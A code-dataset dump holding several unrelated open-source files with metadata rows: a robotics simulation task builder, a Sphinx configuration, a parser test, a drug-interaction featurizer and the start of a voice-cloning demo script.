from dm_robotics.manipulation.standard_cell import rgb_basket
from dm_robotics.moma import base_task
from dm_robotics.moma import entity_initializer
from dm_robotics.moma import prop
from dm_robotics.moma import robot as moma_robot
from dm_robotics.moma.effectors import arm_effector as arm_effector_module
from dm_robotics.moma.effectors import cartesian_4d_velocity_effector
from dm_robotics.moma.effectors import cartesian_6d_velocity_effector
from dm_robotics.moma.effectors import default_gripper_effector
from dm_robotics.moma.effectors import min_max_effector
from dm_robotics.moma.models.arenas import empty
from dm_robotics.moma.models.end_effectors.robot_hands import robotiq_2f85
from dm_robotics.moma.models.end_effectors.wrist_sensors import robotiq_fts300
from dm_robotics.moma.models.robots.robot_arms import sawyer
from dm_robotics.moma.models.robots.robot_arms import sawyer_constants
from dm_robotics.moma.sensors import action_sensor
from dm_robotics.moma.sensors import camera_sensor
from dm_robotics.moma.sensors import prop_pose_sensor
from dm_robotics.moma.sensors import robot_arm_sensor
from dm_robotics.moma.sensors import robot_tcp_sensor
from dm_robotics.moma.sensors import robot_wrist_ft_sensor
from dm_robotics.moma.sensors import robotiq_gripper_sensor
from dm_robotics.moma.sensors import site_sensor
import numpy as np
# Margin from the joint limits at which to stop the Z rotation when using 4D
# control. Values chosen to match the existing PyRobot-based environments.
_WRIST_JOINT_LIMIT_MARGIN = 0.4
WRIST_RANGE = (
sawyer_constants.JOINT_LIMITS['min'][-1] + _WRIST_JOINT_LIMIT_MARGIN,
    sawyer_constants.JOINT_LIMITS['max'][-1] - _WRIST_JOINT_LIMIT_MARGIN)
# Position of the basket relative to the attachment point of the robot.
_DEFAULT_BASKET_CENTER = (0.6, 0.)
DEFAULT_BASKET_HEIGHT = 0.0498
_BASKET_ORIGIN = _DEFAULT_BASKET_CENTER + (DEFAULT_BASKET_HEIGHT,)
WORKSPACE_CENTER = np.array(_DEFAULT_BASKET_CENTER + (0.1698,))
WORKSPACE_SIZE = np.array([0.25, 0.25, 0.2])
# Maximum linear and angular velocity of the robot's TCP.
_MAX_LIN_VEL = 0.07
_MAX_ANG_VEL = 1.0
# Limits of the distributions used to sample initial positions (X, Y, Z in [m])
# for props in the basket.
_PROP_MIN_POSITION_BOUNDS = [0.50, -0.10, 0.12]
_PROP_MAX_POSITION_BOUNDS = [0.70, 0.10, 0.12]
# Limits of the distributions used to sample initial position for TCP.
_TCP_MIN_POSE_BOUNDS = [0.5, -0.14, 0.22, np.pi, 0, -np.pi / 4]
_TCP_MAX_POSE_BOUNDS = [0.7, 0.14, 0.43, np.pi, 0, np.pi / 4]
# Control timestep exposed to the agent.
_CONTROL_TIMESTEP = 0.05
# Joint state used for the nullspace.
_NULLSPACE_JOINT_STATE = [
0.0, -0.5186220703125, -0.529384765625, 1.220857421875, 0.40857421875,
1.07831640625, 0.0]
# Joint velocity magnitude limits from the Sawyer URDF.
_JOINT_VEL_LIMITS = sawyer_constants.VELOCITY_LIMITS['max']
# Identifier for the cameras. The key is the name used for the MoMa camera
# sensor and the value corresponds to the identifier of that camera in the
# mjcf model.
_CAMERA_IDENTIFIERS = {'basket_back_left': 'base/basket_back_left',
'basket_front_left': 'base/basket_front_left',
'basket_front_right': 'base/basket_front_right'}
# Configuration of the MuJoCo cameras.
_CAMERA_CONFIG = camera_sensor.CameraConfig(
width=128,
height=128,
fovy=30.,
has_rgb=True,
has_depth=False,
)
def rgb_task(red_obj_id: str,
green_obj_id: str,
blue_obj_id: str) -> base_task.BaseTask:
"""Builds a BaseTask and all dependencies.
Args:
red_obj_id: The RGB object ID that corresponds to the red object. More
information on this can be found in the RGB Objects file.
green_obj_id: See `red_obj_id`
blue_obj_id: See `red_obj_id`
Returns:
The modular manipulation (MoMa) base task for the RGB stacking environment.
A robot is placed in front of a basket containing 3 objects: a red, a green
and blue one.
"""
# Build the composer scene.
arena = _arena()
_workspace(arena)
robot = _sawyer_robot(robot_name='robot0')
arena.attach(robot.arm)
# We add a camera with a good point of view for capturing videos.
pos = '1.4 0.0 0.45'
quat = '0.541 0.455 0.456 0.541'
name = 'main_camera'
fovy = '45'
arena.mjcf_model.worldbody.add(
'camera', name=name, pos=pos, quat=quat, fovy=fovy)
props = _props(red_obj_id, green_obj_id, blue_obj_id)
for p in props:
frame = arena.add_free_entity(p)
p.set_freejoint(frame.freejoint)
# Add in the MoMa sensor to get observations from the environment.
extra_sensors = prop_pose_sensor.build_prop_pose_sensors(props)
camera_configurations = {
name: _CAMERA_CONFIG for name in _CAMERA_IDENTIFIERS.keys()}
extra_sensors.extend(
camera_sensor.build_camera_sensors(
camera_configurations, arena.mjcf_model, _CAMERA_IDENTIFIERS))
# Initializers to place the TCP and the props in the basket.
dynamic_initializer = entity_initializer.TaskEntitiesInitializer(
[_gripper_initializer(robot), _prop_initializers(props)])
moma_task = base_task.BaseTask(
task_name='rgb_stacking',
arena=arena,
robots=[robot],
props=props,
extra_sensors=extra_sensors,
extra_effectors=[],
scene_initializer=lambda _: None,
episode_initializer=dynamic_initializer,
control_timestep=_CONTROL_TIMESTEP)
return moma_task
def _workspace(arena: composer.Arena) -> rgb_basket.RGBBasket:
"""Returns the basket used in the single panda environment."""
workspace = rgb_basket.RGBBasket()
attachment_site = arena.mjcf_model.worldbody.add(
'site', pos=_BASKET_ORIGIN, rgba='0 0 0 0', size='0.01')
arena.attach(workspace, attachment_site)
return workspace
def _gripper_initializer(
robot: moma_robot.Robot) -> entity_initializer.PoseInitializer:
"""Populates components with gripper initializers."""
gripper_pose_dist = pose_distribution.UniformPoseDistribution(
min_pose_bounds=_TCP_MIN_POSE_BOUNDS,
max_pose_bounds=_TCP_MAX_POSE_BOUNDS)
return entity_initializer.PoseInitializer(robot.position_gripper,
gripper_pose_dist.sample_pose)
def _prop_initializers(
props: Sequence[prop.Prop]) -> entity_initializer.PropPlacer:
"""Populates components with prop pose initializers."""
prop_position = distributions.Uniform(_PROP_MIN_POSITION_BOUNDS,
_PROP_MAX_POSITION_BOUNDS)
prop_quaternion = rotations.UniformQuaternion()
return entity_initializer.PropPlacer(
props=props,
position=prop_position,
quaternion=prop_quaternion,
settle_physics=True)
def _arena() -> composer.Arena:
"""Builds an arena Entity."""
arena = empty.Arena()
arena.mjcf_model.size.nconmax = 5000
arena.mjcf_model.size.njmax = 5000
return arena
def _sawyer_robot(robot_name: str) -> moma_robot.Robot:
"""Returns a Sawyer robot with all the sensors and effectors."""
arm = sawyer.Sawyer(
name=robot_name, actuation=sawyer_constants.Actuation.INTEGRATED_VELOCITY)
gripper = robotiq_2f85.Robotiq2F85()
wrist_ft = robotiq_fts300.RobotiqFTS300()
wrist_cameras = []
# Compose the robot after its model components are constructed. This should
# usually be done early on as some Effectors (and possibly Sensors) can only
# be constructed after the robot components have been composed.
moma_robot.standard_compose(
arm=arm, gripper=gripper, wrist_ft=wrist_ft, wrist_cameras=wrist_cameras)
# We need to measure the last action sent to the robot and the gripper.
arm_effector, arm_action_sensor = action_sensor.create_sensed_effector(
arm_effector_module.ArmEffector(
arm=arm, action_range_override=None, robot_name=robot_name))
# Effector used for the gripper. The gripper is controlled by applying the
# min or max command, this allows the agent to quicky learn how to grasp
# instead of learning how to close the gripper first.
gripper_effector, gripper_action_sensor = action_sensor.create_sensed_effector(
default_gripper_effector.DefaultGripperEffector(gripper, robot_name))
# Enable bang bang control for the gripper, this allows the agent to close and
# open the gripper faster.
gripper_effector = min_max_effector.MinMaxEffector(
base_effector=gripper_effector)
# Build the 4D cartesian controller, we use a 6D cartesian effector under the
# hood.
effector_model = cartesian_6d_velocity_effector.ModelParams(
element=arm.wrist_site, joints=arm.joints)
effector_control = cartesian_6d_velocity_effector.ControlParams(
control_timestep_seconds=_CONTROL_TIMESTEP,
max_lin_vel=_MAX_LIN_VEL,
max_rot_vel=_MAX_ANG_VEL,
joint_velocity_limits=np.array(_JOINT_VEL_LIMITS),
nullspace_gain=0.025,
nullspace_joint_position_reference=np.array(_NULLSPACE_JOINT_STATE),
regularization_weight=1e-2,
enable_joint_position_limits=True,
minimum_distance_from_joint_position_limit=0.01,
joint_position_limit_velocity_scale=0.95,
max_cartesian_velocity_control_iterations=300,
max_nullspace_control_iterations=300)
# Don't activate collision avoidance because we are restricted to the virtual
# workspace in the center of the basket.
cart_effector_6d = cartesian_6d_velocity_effector.Cartesian6dVelocityEffector(
robot_name=robot_name,
joint_velocity_effector=arm_effector,
model_params=effector_model,
control_params=effector_control)
cart_effector_4d = cartesian_4d_velocity_effector.Cartesian4dVelocityEffector(
effector_6d=cart_effector_6d,
element=arm.wrist_site,
effector_prefix=f'{robot_name}_cart_4d_vel')
# Constrain the workspace of the robot.
cart_effector_4d = cartesian_4d_velocity_effector.limit_to_workspace(
cartesian_effector=cart_effector_4d,
element=gripper.tool_center_point,
min_workspace_limits=WORKSPACE_CENTER - WORKSPACE_SIZE / 2,
max_workspace_limits=WORKSPACE_CENTER + WORKSPACE_SIZE / 2,
wrist_joint=arm.joints[-1],
wrist_limits=WRIST_RANGE,
reverse_wrist_range=True)
robot_sensors = []
# Sensor for the joint states (torques, velocities and angles).
robot_sensors.append(robot_arm_sensor.RobotArmSensor(
arm=arm, name=f'{robot_name}_arm', have_torque_sensors=True))
# Sensor for the cartesian pose of the tcp site.
robot_sensors.append(robot_tcp_sensor.RobotTCPSensor(
gripper=gripper, name=robot_name))
# Sensor for cartesian pose of the wrist site.
robot_sensors.append(site_sensor.SiteSensor(
site=arm.wrist_site, name=f'{robot_name}_wrist_site'))
# Sensor to measure the state of the gripper (position, velocity and grasp).
robot_sensors.append(robotiq_gripper_sensor.RobotiqGripperSensor(
gripper=gripper, name=f'{robot_name}_gripper'))
# Sensor for the wrench measured at the wrist sensor.
robot_sensors.append(robot_wrist_ft_sensor.RobotWristFTSensor(
wrist_ft_sensor=wrist_ft, name=f'{robot_name}_wrist'))
# Sensors to measure the last action sent to the arm joints and the gripper
# actuator.
robot_sensors.extend([arm_action_sensor, gripper_action_sensor])
return moma_robot.StandardRobot(
arm=arm,
arm_base_site_name='base_site',
gripper=gripper,
robot_sensors=robot_sensors,
wrist_cameras=wrist_cameras,
arm_effector=cart_effector_4d,
gripper_effector=gripper_effector,
wrist_ft=wrist_ft,
name=robot_name)
def _props(red: str, green: str, blue: str) -> Sequence[prop.Prop]:
"""Build task props."""
objects = ((red, 'red'), (green, 'green'), (blue, 'blue'))
color_set = [
[1, 0, 0, 1],
[0, 1, 0, 1],
[0, 0, 1, 1],
]
props = []
for i, (obj_id, color) in enumerate(objects):
p = rgb_object.RgbObjectProp(
obj_id=obj_id, color=color_set[i], name=f'rgb_object_{color}')
p = prop.WrapperProp(wrapped_entity=p, name=f'rgb_object_{color}')
props.append(p)
return props
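# --- Illustrative sketch (not part of the original module) -------------------
# The virtual workspace enforced via limit_to_workspace above is simply the box
# centred on WORKSPACE_CENTER with edge lengths WORKSPACE_SIZE:
def _workspace_limits_demo():
    lower = WORKSPACE_CENTER - WORKSPACE_SIZE / 2  # [0.475, -0.125, 0.0698]
    upper = WORKSPACE_CENTER + WORKSPACE_SIZE / 2  # [0.725, 0.125, 0.2698]
    return lower, upper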
| 38.908832
| 81
| 0.755144
|
961d37a7997dab4da3dd3d59d297c6b8352a78c7
| 8,770
|
py
|
Python
|
docs/sphinx/conf.py
|
dvstark/tree
|
6928997f0370929de7ef7efb070f614fdd6fa8f5
|
[
"BSD-3-Clause"
] | 2
|
2019-01-21T06:33:44.000Z
|
2019-06-19T09:29:46.000Z
|
docs/sphinx/conf.py
|
dvstark/tree
|
6928997f0370929de7ef7efb070f614fdd6fa8f5
|
[
"BSD-3-Clause"
] | 28
|
2018-07-12T14:02:38.000Z
|
2021-12-15T18:27:38.000Z
|
docs/sphinx/conf.py
|
dvstark/tree
|
6928997f0370929de7ef7efb070f614fdd6fa8f5
|
[
"BSD-3-Clause"
] | 7
|
2017-11-29T14:19:03.000Z
|
2021-07-13T20:29:21.000Z
|
# -*- coding: utf-8 -*-
#
# BMO documentation build configuration file, created by
# sphinx-quickstart on Fri May 5 01:30:21 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
from pkg_resources import parse_version
try:
from tree import __version__
except ModuleNotFoundError:
from sdsstools import get_package_version
__version__ = get_package_version(__file__, 'sdss-tree') or 'dev'
# add a local path to the Sphinx search path
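# An illustrative (commented-out) example of doing that, mirroring the stock
# sphinx-quickstart scaffold; the relative path is a placeholder:
# import os
# import sys
# sys.path.insert(0, os.path.abspath('../..'))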
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'sphinx.ext.autosummary',
'sphinx.ext.todo', 'sphinx.ext.viewcode', 'sphinx.ext.mathjax',
'sphinx.ext.intersphinx', 'tree.misc.docutree', 'recommonmark', 'sphinxarg.ext',
'sphinx_issues']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = ['.rst', '.md']
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'tree'
copyright = '{0}, {1}'.format('2017', 'Brian Cherinka')
author = 'Brian Cherinka'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The short X.Y version.
version = parse_version(__version__).base_version
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'py:obj'
issues_github_path = "sdss/tree"
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# Intersphinx mappings
intersphinx_mapping = {'python': ('https://docs.python.org/3.6', None),
'astropy': ('http://docs.astropy.org/en/latest', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None)}
autodoc_mock_imports = ['_tkinter']
autodoc_member_order = 'groupwise'
napoleon_use_rtype = False
napoleon_use_ivar = True
rst_epilog = """
.. |numpy_array| replace:: Numpy array
.. |HDUList| replace:: :class:`~astropy.io.fits.HDUList`
"""
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'bootstrap'
html_sidebars = {}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "SDSS: Tree",
# Tab name for entire site. (Default: "Site")
'navbar_site_name': "Site",
# A list of tuples containing pages or urls to link to.
# Valid tuples should be in the following forms:
# (name, page) # a link to a page
# (name, "/aa/bb", 1) # a link to an arbitrary relative url
# (name, "http://example.com", True) # arbitrary absolute url
# Note the "1" or "True" value above as the third argument to indicate
# an arbitrary url.
'navbar_links': [
],
# Render the next and previous page links in navbar. (Default: true)
'navbar_sidebarrel': False,
# Render the current pages TOC in the navbar. (Default: true)
'navbar_pagenav': False,
# Tab name for the current pages TOC. (Default: "Page")
'navbar_pagenav_name': "Page",
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 2,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For black navbar, do "navbar navbar-inverse"
'navbar_class': "navbar",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "",
# Bootswatch (http://bootswatch.com/) theme.
#
# Options are nothing (default) or the name of a valid theme
# such as "amelia" or "cosmo".
'bootswatch_theme': "paper",
# Choose Bootstrap version.
# Values: "3" (default) or "2" (in quotes)
'bootstrap_version': "3",
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
html_favicon = './_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_sidebars = {'**': ['localtoc.html']}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = '{0}pdoc'.format('tree')
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, '{0}.tex'.format(project), u'{0} Documentation'.format(project),
author, 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tree', u'{0} Documentation'.format(project),
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, project, u'{0} Documentation'.format(project),
author, project, 'One line description of project.',
'Miscellaneous'),
]
| 32.60223
| 94
| 0.675143
|
9acbea5e32723f67d514e711311e4dd2030751b2
| 1,769
|
py
|
Python
|
pypy/rlib/parsing/test/test_parseerrors.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 12
|
2016-01-06T07:10:28.000Z
|
2021-05-13T23:02:02.000Z
|
pypy/rlib/parsing/test/test_parseerrors.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | null | null | null |
pypy/rlib/parsing/test/test_parseerrors.py
|
woodrow/pyoac
|
b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7
|
[
"MIT"
] | 2
|
2016-07-29T07:09:50.000Z
|
2016-10-16T08:50:26.000Z
|
import py
from pypy.rlib.parsing.parsing import PackratParser, Rule, Nonterminal
from pypy.rlib.parsing.parsing import Symbol, ParseError
from pypy.rlib.parsing.ebnfparse import parse_ebnf, make_parse_function
from pypy.rlib.parsing.deterministic import LexerError
from pypy.rlib.parsing.tree import RPythonVisitor
class TestDictError(object):
dictebnf = """
QUOTED_STRING: "'[^\\']*'";
IGNORE: " |\n";
data: <dict> | <QUOTED_STRING> | <list>;
dict: ["{"] (dictentry [","])* dictentry ["}"];
dictentry: QUOTED_STRING [":"] data;
list: ["["] (data [","])* data ["]"];
"""
def setup_class(cls):
regexs, rules, ToAST = parse_ebnf(cls.dictebnf)
cls.ToAST = ToAST
parse = make_parse_function(regexs, rules, eof=True)
cls.parse = staticmethod(parse)
def test_lexererror(self):
excinfo = py.test.raises(LexerError, self.parse, """
{
'type': 'SCRIPT',$#
'funDecls': '',
'length': '1',
}""")
msg = excinfo.value.nice_error_message("<stdin>")
print msg
assert msg == """\
File <stdin>, line 2
'type': 'SCRIPT',$#
^
LexerError"""
def test_parseerror(self):
source = """
{
'type': 'SCRIPT',
'funDecls': '',
'length':: '1',
}"""
excinfo = py.test.raises(ParseError, self.parse, source)
error = excinfo.value.errorinformation
source_pos = excinfo.value.source_pos
assert source_pos.lineno == 4
assert source_pos.columnno == 13
msg = excinfo.value.nice_error_message("<stdin>", source)
print msg
assert msg == """\
File <stdin>, line 4
'length':: '1',
^
ParseError: expected '{', 'QUOTED_STRING' or '['"""
| 30.5
| 71
| 0.588468
|
7bc22d292f7a47d0283dfe9403571bc8abea8f70
| 5,621
|
py
|
Python
|
application/feature_generation.py
|
AshwinHegde/Insight_Project_Framework
|
174951e2e15f84b15879032b4f47c3a7d6779af0
|
[
"MIT"
] | null | null | null |
application/feature_generation.py
|
AshwinHegde/Insight_Project_Framework
|
174951e2e15f84b15879032b4f47c3a7d6779af0
|
[
"MIT"
] | null | null | null |
application/feature_generation.py
|
AshwinHegde/Insight_Project_Framework
|
174951e2e15f84b15879032b4f47c3a7d6779af0
|
[
"MIT"
] | 1
|
2020-01-21T19:55:24.000Z
|
2020-01-21T19:55:24.000Z
|
import rdkit as rd
from rdkit import Chem
from rdkit.Chem import AllChem
import numpy as np
from collections import Counter
from gensim.models import word2vec
from mol2vec_utils import *
# File to generate numerical features from smiles data and replace
# interaction labels by numerical ones
#
def smiles_to_ECFP(smiles, model = None, fp_radius = 2):
'''Convert a SMILES representation to ECFP representation.
Args :
smiles (str): SMILES representation.
fp_radius (int): Radius for which the Morgan fingerprint is to be computed.
Returns :
fparr (numpy.ndarray): Morgan fingerprint in the form of a NumPy array.
Returns None if smiles is None or not readable.
'''
if smiles is not None:
mol = Chem.MolFromSmiles(smiles)
if mol is not None:
fp = AllChem.GetMorganFingerprintAsBitVect(mol, fp_radius)
else:
return None
fparr = np.zeros((1,))
rd.DataStructs.ConvertToNumpyArray(fp, fparr)
else:
return None
fparr = fparr.astype('B') # Convert to byte to save memory
return fparr
def smiles_to_mol2vec_vector(smiles, model, fp_radius = 2, uncommon = None):
'''Convert a SMILES string to a Mol2Vec vector
'''
if uncommon:
try:
model[uncommon]
except KeyError:
raise KeyError('Selected word for uncommon: %s not in vocabulary' % uncommon)
mol = Chem.MolFromSmiles(smiles)
if mol is not None:
sentence = mol2alt_sentence(mol, fp_radius)
vec = sentence2vec(sentence, model, unseen = uncommon)
if vec.shape == (300,):
return vec
else:
return None
else:
return None
def featurize_smiles_and_interactions(relation_list, smiles_feature_generator,\
smiles_dict, label_map):
'''Generate numerical features from smiles data and label interactions.
The dictionary smiles_dict is used to find the SMILES representations of
drugs found in relation_list. The function smiles_feature_generator
is then applied to these SMILES representations to generate features to
train the model. The dictionary label_map is used to convert the interaction
keywords in relation_list to numerical labels.
Args :
relation_list (list): List of Relation instances
smiles_feature_generator (function): Function that maps a SMILES string
to some kind of numerical feature.
smiles_dict (dict): Dictionary mapping drug names to SMILES strings.
label_map (dict): Dictionary mapping interaction keywords to
numerical labels.
Returns :
smiles_feature_list (list): List of features converted from SMILES strings.
interaction_label_list (list): List of interaction labels that will be the
target for classification.
drug_pair_list (list): List of pairs of drug names for later reference.
'''
feature_dict = {}
smiles_feature_list = []
interaction_label_list = []
drug_pair_list = []
if smiles_feature_generator == smiles_to_mol2vec_vector:
model = word2vec.Word2Vec.load('model_300dim.pkl')
else:
model = None
for relation in relation_list:
sub, obj, interaction = relation.get()
sub_smiles, obj_smiles = smiles_dict[sub], smiles_dict[obj]
if sub_smiles not in feature_dict:
feature_dict[sub_smiles] = smiles_feature_generator(sub_smiles, model = model)
sub_feature = feature_dict[sub_smiles]
if obj_smiles not in feature_dict:
feature_dict[obj_smiles] = smiles_feature_generator(obj_smiles, model = model)
obj_feature = feature_dict[obj_smiles]
interaction_label = label_map[interaction]
if sub_feature is not None and obj_feature is not None:
smiles_feature_list.append(np.concatenate((sub_feature, obj_feature)))
interaction_label_list.append(interaction_label)
drug_pair_list.append((sub, obj))
return smiles_feature_list, interaction_label_list, drug_pair_list
def filter_less_frequent_labels(smiles_feature_list, interaction_label_list,\
drug_pair_list, cutoff_freq):
'''Filters out labels that appear below a certain frequency.
Args :
smiles_feature_list (list): List of numerical features (obtained from SMILES strings).
interaction_label_list (list): List of numerical labels that are the target for
classification.
drug_pair_list (list): List of pairs of drug names.
cutoff_freq (list): Only interactions labels that appear above this number are kept.
Returns :
smiles_feature_list (list): Filtered list of features.
interaction_label_list (list): Filtered list of interaction labels.
drug_pair_list (list): Filtered list of pairs of drug names.
'''
assert(len(smiles_feature_list) == len(interaction_label_list))
assert(len(drug_pair_list) == len(interaction_label_list))
label_freq = Counter()
for label in interaction_label_list:
label_freq[label] += 1
filter_count = 0
index = 0
while index < len(smiles_feature_list):
if label_freq[interaction_label_list[index]] < cutoff_freq:
del smiles_feature_list[index]
del interaction_label_list[index]
del drug_pair_list[index]
filter_count += 1
else:
index += 1
return smiles_feature_list, interaction_label_list, drug_pair_list, filter_count
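# --- Illustrative usage sketch (not part of the original module) -------------
# Fingerprint a single molecule; the SMILES string below (aspirin) is only an
# example input.
if __name__ == '__main__':
    demo_fp = smiles_to_ECFP('CC(=O)Oc1ccccc1C(=O)O')
    if demo_fp is not None:
        print('ECFP bits set:', int(demo_fp.sum()))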
| 35.13125
| 94
| 0.68422
|
ba5f299afe1970b105ca9c78b8187cfb65cd88ce
| 11,407
|
py
|
Python
|
demo_cli.py
|
a-k-coder/Real-Time-Voice-Cloning
|
00f3c065d5c695352235614b22dba436f51c9936
|
[
"MIT"
] | null | null | null |
demo_cli.py
|
a-k-coder/Real-Time-Voice-Cloning
|
00f3c065d5c695352235614b22dba436f51c9936
|
[
"MIT"
] | null | null | null |
demo_cli.py
|
a-k-coder/Real-Time-Voice-Cloning
|
00f3c065d5c695352235614b22dba436f51c9936
|
[
"MIT"
] | null | null | null |
from encoder.params_model import model_embedding_size as speaker_embedding_size
from utils.argutils import print_args
from utils.modelutils import check_model_paths
from synthesizer.inference import Synthesizer
from encoder import inference as encoder
from vocoder import inference as vocoder
from pathlib import Path
import numpy as np
import soundfile as sf
import librosa
import argparse
import torch
import sys
import os
from audioread.exceptions import NoBackendError
if __name__ == '__main__':
## Info & args
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("-e", "--enc_model_fpath", type=Path,
default="encoder/saved_models/pretrained.pt",
help="Path to a saved encoder")
parser.add_argument("-s", "--syn_model_fpath", type=Path,
default="synthesizer/saved_models/pretrained/pretrained.pt",
help="Path to a saved synthesizer")
parser.add_argument("-v", "--voc_model_fpath", type=Path,
default="vocoder/saved_models/pretrained/pretrained.pt",
help="Path to a saved vocoder")
parser.add_argument("--cpu", action="store_true", help=\
"If True, processing is done on CPU, even when a GPU is available.")
parser.add_argument("--no_sound", action="store_true", help=\
"If True, audio won't be played.")
parser.add_argument("--seed", type=int, default=None, help=\
"Optional random number seed value to make toolbox deterministic.")
parser.add_argument("--no_mp3_support", action="store_true", help=\
"If True, disallows loading mp3 files to prevent audioread errors when ffmpeg is not installed.")
#
# Add arguments for path to reference voice file and text to be cloned.
#
    parser.add_argument("--path", type=Path, help="Reference voice: an audio filepath of a voice to be cloned (mp3, wav, m4a, flac, ...)")
    parser.add_argument("--text", type=str, help="A sentence (+-20 words) to be synthesized")
#
args = parser.parse_args()
print_args(args, parser)
if not args.no_sound:
import sounddevice as sd
if args.cpu:
# Hide GPUs from Pytorch to force CPU processing
os.environ["CUDA_VISIBLE_DEVICES"] = ""
if not args.no_mp3_support:
try:
librosa.load("samples/1320_00000.mp3")
except NoBackendError:
print("Librosa will be unable to open mp3 files if additional software is not installed.\n"
"Please install ffmpeg or add the '--no_mp3_support' option to proceed without support for mp3 files.")
exit(-1)
print("Running a test of your configuration...\n")
if torch.cuda.is_available():
device_id = torch.cuda.current_device()
gpu_properties = torch.cuda.get_device_properties(device_id)
## Print some environment information (for debugging purposes)
print("Found %d GPUs available. Using GPU %d (%s) of compute capability %d.%d with "
"%.1fGb total memory.\n" %
(torch.cuda.device_count(),
device_id,
gpu_properties.name,
gpu_properties.major,
gpu_properties.minor,
gpu_properties.total_memory / 1e9))
else:
print("Using CPU for inference.\n")
## Remind the user to download pretrained models if needed
check_model_paths(encoder_path=args.enc_model_fpath,
synthesizer_path=args.syn_model_fpath,
vocoder_path=args.voc_model_fpath)
## Load the models one by one.
print("Preparing the encoder, the synthesizer and the vocoder...")
encoder.load_model(args.enc_model_fpath)
synthesizer = Synthesizer(args.syn_model_fpath)
vocoder.load_model(args.voc_model_fpath)
## Run a test
print("Testing your configuration with small inputs.")
# Forward an audio waveform of zeroes that lasts 1 second. Notice how we can get the encoder's
# sampling rate, which may differ.
# If you're unfamiliar with digital audio, know that it is encoded as an array of floats
# (or sometimes integers, but mostly floats in this projects) ranging from -1 to 1.
# The sampling rate is the number of values (samples) recorded per second, it is set to
# 16000 for the encoder. Creating an array of length <sampling_rate> will always correspond
# to an audio of 1 second.
print("\tTesting the encoder...")
encoder.embed_utterance(np.zeros(encoder.sampling_rate))
# Create a dummy embedding. You would normally use the embedding that encoder.embed_utterance
# returns, but here we're going to make one ourselves just for the sake of showing that it's
# possible.
embed = np.random.rand(speaker_embedding_size)
# Embeddings are L2-normalized (this isn't important here, but if you want to make your own
# embeddings it will be).
embed /= np.linalg.norm(embed)
# The synthesizer can handle multiple inputs with batching. Let's create another embedding to
# illustrate that
embeds = [embed, np.zeros(speaker_embedding_size)]
texts = ["test 1", "test 2"]
